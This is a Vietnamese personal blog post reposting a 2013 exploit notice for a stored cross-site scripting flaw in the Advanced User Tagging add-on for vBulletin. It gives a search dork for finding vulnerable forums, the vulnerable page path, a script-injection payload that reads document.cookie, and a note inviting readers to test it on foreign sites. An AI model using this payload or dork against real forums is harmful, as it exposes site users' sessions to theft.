INFO

My BlogsViệt.Net

- Never frown, even when you are sad
- Because you never know who is falling in love with your smile.
- Đừng bao giờ tiết kiệm nụ cười ngay cả khi bạn buồn♥
- Vì không bao giờ bạn biết được, có thể có ai đó sẽ yêu bạn vì nụ cười đó.

Info

Cảm xúc thật. Và Tình Yêu Anh Dành Cho Em Cũng Thật

Thứ Năm, 11 tháng 7, 2013

vBulletin Advanced User Tagging Cross Site Scripting

vBulletin Advanced User Tagging Cross Site Scripting

# Exploit Title: Advanced User Tagging vBulletin -- Stored XSS Vulnerability
# Google Dork: intext:usertag_pro
# Date: 10.07.2013
# Exploit Author: []0iZy5
# Vendor Homepage: www.backtrack-linux.ro
# Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product
# Version: vBulletin 3.8.x, vBulletin 4.x.x
# Tested on: Linux & Windows
#
################################################################################​##########
#
# Stage 1: Go to -> UserCP -> Hash Tag Subscriptions
# Direct Link: http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription
#
# Stage 2: Add a malicious hash tag.
# Example: "><script>alert(document.cookie)</script>
#
################################################################################​##########
#
# This was written for educational purpose only. use it at your own risk.
# Author will be not responsible for any damage caused! user assumes all responsibility.
# Intended for authorized web application pentesting only!
Demo:
p/s: đăng ký 1 acc để test nhé
(vì việt nam ít admin xài cái này nên chỉ có demo nước ngoài thôi )

Artikel Terkait

0   nhận xét

Đăng nhận xét

Cancel Reply